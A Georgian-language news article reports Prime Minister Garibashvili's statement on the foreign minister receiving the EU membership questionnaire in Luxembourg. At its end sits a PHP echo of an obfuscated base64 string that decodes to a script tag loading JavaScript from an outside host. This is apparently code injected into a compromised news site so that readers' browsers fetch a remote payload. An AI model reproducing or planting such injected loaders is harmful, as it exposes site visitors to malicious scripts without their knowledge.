celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილის განცხადებით, საქართველოს საგარეო საქმეთა მინისტრი ილია დარჩიაშვილი ლუქსემბურგში იმყოფება, სადაც ევროკომისარი ოლივერ ვარჰეი დღეს მას ევროკავშირში წევრობის განაცხადზე კითხვარს გადასცემს. ამის შესახებ ღარიბაშვილი მთავრობის დღევანდელ სხდომაზე განაცხადა.
 
მისივე თქმით, საქართველომ მაქსიმალურად მოკლე დროში უნდა მიაწოდოს ბრიუსელს ევროკავშირში წევრობის განაცხადზე შევსებული კითხვარი.
 
„მნიშვნელოვანი დღე არის. საგარეო საქმეთა მინისტრი ილია დარჩიაშვილი იმყოფება ლუქსემბურგში, სადაც შეხვდება ევროკომისარ ოლივერ ვარჰეის, რომელიც გადასცემს ილია დარჩიაშვილს ევროკავშირში გაწევრიანების კითხვარს. მოგეხსენებათ, ამით ჩვენ რეალურად ახალ ეტაპზე გადავდივართ, მას შემდეგ, რაც ჩვენ წარვადგინეთ წევრობაზე განაცხადი, პროცესი დაწყებულია, ჩვენ ახლა მივიღებთ ამ კითხვარს. პროცესს სჭირდება მაქსიმალური ჩართულობა ყველა უწყების მხრიდან. მე პირადად გავაკონტროლებ ამ პროცესს და ვიქნები ჩართული. ჩვენ მაქსიმალურად მოკლე დროში უნდა მივაწოდოთ შევსებული კითხვარი ბრიუსელს.
 
აქვე მინდა, კიდევ ერთხელ შევახსენო ჩვენს მოქალაქეებს, ყველა ის სიკეთე, პროგრესი, რომელიც მიღწეულ იქნა ამ ბოლო წლების განმავლობაში ევროკავშირთან ურთიერთობაში, არის სწორედ ჩვენი ხელისუფლების, მმართველი პარტიის დამსახურება, დაწყებული ასოცირების შეთანხმების გაფორმებით, ასევე თავისუფალი ვაჭრობა, უვიზო რეჟიმი, ახლა უკვე ოფიციალური განაცხადი წევრობაზე, ეს ყველაფერი უკავშირდება სწორედ „ქართულ ოცნებას“. ამიტომ, ამ პასუხისმგებლობით, ჩვენ მივიღებთ რა ამ კითხვარს, ჩავერთვებით და მაქსიმალურად მოკლე დროში წარვადგენთ შევსებულ დოკუმენტაციას. მოლოდინი მაქვს, რომ გვექნება მჭიდრო თანამშრომლობა პარლამენტთან, სხვა დაინტერესებულ პირებთან, რომლებიც ამ პროცესში თავის წვლილს შეიტანენ“, – განაცხადა ირაკლი ღარიბაშვილმა.
819
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");